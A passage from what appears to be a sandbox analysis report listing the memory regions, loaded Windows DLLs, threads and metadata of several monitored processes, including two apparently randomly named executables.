"c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2055 start_va = 0x21f0000 end_va = 0x2234fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2058 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2059 start_va = 0x2260000 end_va = 0x22edfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2060 start_va = 0x5c0000 end_va = 0x5c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2061 start_va = 0x2240000 end_va = 0x2240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 2062 start_va = 0x27a0000 end_va = 0x2b9afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 2063 start_va = 0x22f0000 end_va = 0x22f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022f0000" filename = "" Region: id = 2064 start_va = 0x22f0000 end_va = 0x22f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2065 start_va = 0x2300000 end_va = 0x2312fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 2066 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 2067 start_va = 0x22f0000 end_va = 0x22f7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 2070 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 2073 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 2074 start_va = 0x7ffc5b320000 end_va = 0x7ffc5b350fff monitored = 0 entry_point = 0x7ffc5b327d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2075 start_va = 0x7ffc545d0000 end_va = 0x7ffc5466bfff monitored = 0 entry_point = 0x7ffc546296a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 2078 start_va = 0x7ffc57bb0000 end_va = 0x7ffc57ce5fff monitored = 0 entry_point = 0x7ffc57bdf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2079 start_va = 0x7ffc52840000 end_va = 0x7ffc5288ffff monitored = 0 entry_point = 0x7ffc52842580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 2080 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 2081 start_va = 0x7ffc5f6f0000 end_va = 0x7ffc5f75efff monitored = 0 entry_point = 0x7ffc5f715f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 2084 start_va = 0x7ffc51640000 end_va = 0x7ffc5164cfff monitored = 0 entry_point = 0x7ffc51641ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 2085 start_va = 0x7ffc516f0000 end_va = 0x7ffc517cafff monitored = 0 entry_point = 0x7ffc517028b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 2086 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2087 start_va = 0x7ffc516c0000 end_va = 0x7ffc516e5fff monitored = 0 entry_point = 0x7ffc516c1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2092 start_va = 0x7ffc516a0000 end_va = 0x7ffc516b1fff monitored = 0 entry_point = 0x7ffc516a3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2093 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 2094 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 2095 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Thread: id = 66 os_tid = 0x5f8 Thread: id = 67 os_tid = 0x9f4 Thread: id = 68 os_tid = 0xa0c Thread: id = 69 os_tid = 0xc14 Thread: id = 70 os_tid = 0x4f0 Thread: id = 71 os_tid = 0x61c Thread: id = 72 os_tid = 0x920 Thread: id = 73 os_tid = 0x2fc Process: id = "8" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x4bd69000" os_pid = "0x904" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3145 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3146 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3147 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3148 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3149 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3150 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3151 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3152 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3153 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3154 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3155 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3156 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3157 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3158 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3159 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3160 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3161 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3162 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3163 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3164 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3165 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3182 start_va = 0x550000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3183 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3224 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3225 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3226 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3227 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3228 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3245 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 3246 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3385 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3386 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3387 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3388 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3389 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 3390 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3391 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3392 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3393 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3394 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3411 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3412 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3413 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3414 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3415 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3416 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3417 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3418 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3419 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3420 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3592 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3593 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3594 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3595 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3596 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 3597 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 83 os_tid = 0xe7c Thread: id = 95 os_tid = 0xb90 Process: id = "9" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x10f72000" os_pid = "0x12f8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3166 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3167 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3168 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3169 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3170 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3171 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3172 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3173 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3174 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3175 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3176 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3177 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3178 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3179 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3180 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3181 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3184 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3185 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3186 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3203 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3204 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3205 start_va = 0x630000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 3206 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3207 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3327 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3328 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3329 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3330 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3331 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3332 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3333 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 3334 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 3335 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3336 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3337 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3338 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3339 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3340 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3341 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3342 start_va = 0x20000 end_va = 0x23fff 